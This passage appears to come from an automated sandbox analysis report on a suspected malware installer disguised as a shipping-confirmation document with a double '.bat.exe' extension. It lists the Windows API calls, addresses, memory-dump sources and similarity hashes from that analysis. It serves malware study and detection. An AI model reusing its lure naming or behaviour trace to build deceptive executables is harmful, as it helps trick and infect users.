                                                                            • Opcode Fuzzy Hash: be6f6e28811eff9f61e37437ffce11e37693180493ed76b7cb4b0af79cd2cf68
                                                                            • Instruction Fuzzy Hash: CEE06D71A04108BFDB01ABA5BE499AEB3B9EB44354B20483FF102B00C8CA784D119A2D
                                                                            APIs
                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023EE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfileStringWrite
                                                                            • String ID:
                                                                            • API String ID: 390214022-0
                                                                            • Opcode ID: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
                                                                            • Instruction ID: 95154b02373db31601182c66ccc42c3a1d246cd64da090b0d32e859a1de181fa
                                                                            • Opcode Fuzzy Hash: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
                                                                            • Instruction Fuzzy Hash: 7DE04F31900524BADB5036B15ECDDBE20685FC8318B14063FFA12B61C2D9FC0C43466D
                                                                            APIs
                                                                            • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E5C,00000000,?,?), ref: 00406546
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                                            • Instruction ID: eb898ae1b777051f051c4ab58df26dcf4e878c8f9f4a5c47b005eb973d4bb03b
                                                                            • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                                            • Instruction Fuzzy Hash: 75E0E6B2010109BEEF095F50EC0AD7F371DE708710F11452EF906D4051E6B5E9309A39
                                                                            APIs
                                                                            • WriteFile.KERNELBASE(00008001,00000000,00000000,00000000,00000000,0040D27B,0040CEF0,0040357E,0040CEF0,0040D27B,00414EF0,00004000,?,00000000,004033A8,00000004), ref: 00406238
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: FileWrite
                                                                            • String ID:
                                                                            • API String ID: 3934441357-0
                                                                            • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                            • Instruction ID: 6296e445ee025582091cb162a3efd7a4c9b40fecddc6e186669f82422f4bfe72
                                                                            • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                            • Instruction Fuzzy Hash: 00E08C3221021AABDF10AE548C00EEB3B6CEB013A0F02447AFD16E3050D231E83097A9
                                                                            APIs
                                                                            • ReadFile.KERNELBASE(00008001,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,004035FA,00008001,00008001,004034FE,00414EF0,00004000,?,00000000,004033A8), ref: 00406209
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID:
                                                                            • API String ID: 2738559852-0
                                                                            • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                            • Instruction ID: f029eba0d3a9f8ebddca737992f63761e7b4746d0aa70cfc26448402395c61e3
                                                                            • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                            • Instruction Fuzzy Hash: 5DE08632154119EBCF106E908C00EEB379CEF15350F014876F921E7440D230E8328FA4
                                                                            APIs
                                                                            • VirtualProtect.KERNELBASE(733B505C,00000004,00000040,733B504C), ref: 733B2A9D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2155284752.00000000733B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 733B0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2155172212.00000000733B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2155846609.00000000733B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2155909402.00000000733B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_733b0000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: ProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 544645111-0
                                                                            • Opcode ID: 79290dd9464cd36c5819f94b6c37a7ed1c6d197540a162937773f6df204e9d7f
                                                                            • Instruction ID: dd3d0c2f1a27456f40e4f2f81c1fba4abe31a0a2f020bedfb9b98cbeb25c232f
                                                                            • Opcode Fuzzy Hash: 79290dd9464cd36c5819f94b6c37a7ed1c6d197540a162937773f6df204e9d7f
                                                                            • Instruction Fuzzy Hash: 02F0A5F2505280DEE3B1EF2A98847093BF8BB58305B24452BE19CD6641F33C4844CF91
                                                                            APIs
                                                                            • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040242A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfileString
                                                                            • String ID:
                                                                            • API String ID: 1096422788-0
                                                                            • Opcode ID: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
                                                                            • Instruction ID: 816608b18dc0c520cd9a71caba4f9b5dbdb35d60be0fcf423de44464aa3a4457
                                                                            • Opcode Fuzzy Hash: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
                                                                            • Instruction Fuzzy Hash: 95E04F31800229BEDB00EFA0CD09DAD3678AF40304F00093EF510BB0D1E7FC49519749
                                                                            APIs
                                                                            • RegOpenKeyExW.KERNELBASE(00000000,00421F28,00000000,00000000,?,?,00000000,?,0040657D,?,00421F28,?,?,Call,?,00000000), ref: 00406513
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: Open
                                                                            • String ID:
                                                                            • API String ID: 71445658-0
                                                                            • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                            • Instruction ID: 600eba3f25fec8fd2e0e76c9bf818d2d921b30b98e1649e5cb913c6f6c6f8cb9
                                                                            • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                            • Instruction Fuzzy Hash: 4DD0123600020DBBDF115E90ED01FAB3B5DAB08714F014826FE06A4091D775D530AB59
                                                                            APIs
                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FB,?), ref: 0040360B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: FilePointer
                                                                            • String ID:
                                                                            • API String ID: 973152223-0
                                                                            • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                            • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                                            • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                            • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                                            APIs
                                                                            • CloseHandle.KERNELBASE(00000000), ref: 733B2C57
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2155284752.00000000733B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 733B0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2155172212.00000000733B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2155846609.00000000733B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2155909402.00000000733B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_733b0000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2962429428-0
                                                                            • Opcode ID: c1a4747436ef77c6cc13d2807373304bae5fae20f8fce4a919b49e28d4dda212
                                                                            • Instruction ID: df5b49f94f43260fc49a8928333f23c21e217e7cb8fee0f0d4505c0d9d3362b5
                                                                            • Opcode Fuzzy Hash: c1a4747436ef77c6cc13d2807373304bae5fae20f8fce4a919b49e28d4dda212
                                                                            • Instruction Fuzzy Hash: E3419FB290428CDFFB31EF65D881F59377DEB44351F308A2AE409C6950EA3D98828B90
                                                                            APIs
                                                                              • Part of subcall function 00405707: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
                                                                              • Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
                                                                              • Part of subcall function 00405707: lstrcatW.KERNEL32(00421F28,004030AD,004030AD,00421F28,00000000,00000000,00000000), ref: 00405762
                                                                              • Part of subcall function 00405707: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405774
                                                                              • Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
                                                                              • Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
                                                                              • Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2
                                                                              • Part of subcall function 00405C65: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405C8E
                                                                              • Part of subcall function 00405C65: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405C9B
                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FF0
                                                                              • Part of subcall function 00406B21: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406B32
                                                                              • Part of subcall function 00406B21: GetExitCodeProcess.KERNEL32(?,?), ref: 00406B54
                                                                              • Part of subcall function 004065C9: wsprintfW.USER32 ref: 004065D6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                            • String ID:
                                                                            • API String ID: 2972824698-0
                                                                            • Opcode ID: 6849614f2a8bfbdd5acfcc5c7dc02bd50f0657ec5184be028ed3315e3fd21a51
                                                                            • Instruction ID: ba3ed7a1875ec382e1b93905bcfefb33a8222a1057eccf936486356e32fab672
                                                                            • Opcode Fuzzy Hash: 6849614f2a8bfbdd5acfcc5c7dc02bd50f0657ec5184be028ed3315e3fd21a51
                                                                            • Instruction Fuzzy Hash: 48F06D32905125EBDB20BBE599C59DE76F59B00318F25413FE102B21E1CB7C4E459A6E
                                                                            APIs
                                                                            • GlobalAlloc.KERNELBASE(00000040,?,733B12DB,?,733B137F,00000019,733B11CA,-000000A0), ref: 733B12C5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2155284752.00000000733B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 733B0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2155172212.00000000733B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2155846609.00000000733B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2155909402.00000000733B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_733b0000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: AllocGlobal
                                                                            • String ID:
                                                                            • API String ID: 3761449716-0
                                                                            • Opcode ID: b328074e85bc4bfcc5e729b9e1a769bff94ba65656acf93b3c6c33f178644c4d
                                                                            • Instruction ID: ac3386a928ded417f0afa0fa788cea5a6f5f9855a752c23220bcbd4d1af586ae
                                                                            • Opcode Fuzzy Hash: b328074e85bc4bfcc5e729b9e1a769bff94ba65656acf93b3c6c33f178644c4d
                                                                            • Instruction Fuzzy Hash: CBB012B26000009FFE10AB15DC0AF34325CF700300F240000B608C1140E1284C008528
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,00000403), ref: 004058A4
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004058B3
                                                                            • GetClientRect.USER32(?,?), ref: 004058F0
                                                                            • GetSystemMetrics.USER32(00000002), ref: 004058F7
                                                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405918
                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405929
                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040593C
                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040594A
                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040595D
                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040597F
                                                                            • ShowWindow.USER32(?,00000008), ref: 00405993
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004059B4
                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004059C4
                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059DD
                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059E9
                                                                            • GetDlgItem.USER32(?,000003F8), ref: 004058C2
                                                                              • Part of subcall function 00404636: SendMessageW.USER32(00000028,?,00000001,00404461), ref: 00404644
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405A06
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000057DA,00000000), ref: 00405A14
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00405A1B
                                                                            • ShowWindow.USER32(00000000), ref: 00405A3F
                                                                            • ShowWindow.USER32(?,00000008), ref: 00405A44
                                                                            • ShowWindow.USER32(00000008), ref: 00405A8E
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405AC2
                                                                            • CreatePopupMenu.USER32 ref: 00405AD3
                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405AE7
                                                                            • GetWindowRect.USER32(?,?), ref: 00405B07
                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405B20
                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B58
                                                                            • OpenClipboard.USER32(00000000), ref: 00405B68
                                                                            • EmptyClipboard.USER32 ref: 00405B6E
                                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B7A
                                                                            • GlobalLock.KERNEL32(00000000), ref: 00405B84
                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B98
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405BB8
                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00405BC3
                                                                            • CloseClipboard.USER32 ref: 00405BC9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                            • String ID: H/B${
                                                                            • API String ID: 590372296-332483393
                                                                            • Opcode ID: d18a2026774e62a2c92573f4287a0ca8136519a3f9d5dde66db426fe6a39353e
                                                                            • Instruction ID: 1bfd88ad0a039f30930ce625e3f17186fc56f4394c79b8c388f8475f2b475093
                                                                            • Opcode Fuzzy Hash: d18a2026774e62a2c92573f4287a0ca8136519a3f9d5dde66db426fe6a39353e
                                                                            • Instruction Fuzzy Hash: A7B127B1900608FFDB21AF60DD85DAE7B79FB44354F00413AFA41A61A0CB795E52DF68
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003FB), ref: 00404B41
                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00404B6B
                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00404C1C
                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404C27
                                                                            • lstrcmpiW.KERNEL32(Call,00422F48,00000000,?,?), ref: 00404C59
                                                                            • lstrcatW.KERNEL32(?,Call), ref: 00404C65
                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404C77
                                                                              • Part of subcall function 00405CC6: GetDlgItemTextW.USER32(?,?,00000400,00404CAE), ref: 00405CD9
                                                                              • Part of subcall function 00406930: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00406993
                                                                              • Part of subcall function 00406930: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069A2
                                                                              • Part of subcall function 00406930: CharNextW.USER32(?,"C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069A7
                                                                              • Part of subcall function 00406930: CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069BA
                                                                            • GetDiskFreeSpaceW.KERNEL32(00420F18,?,?,0000040F,?,00420F18,00420F18,?,00000001,00420F18,?,?,000003FB,?), ref: 00404D3A
                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D55
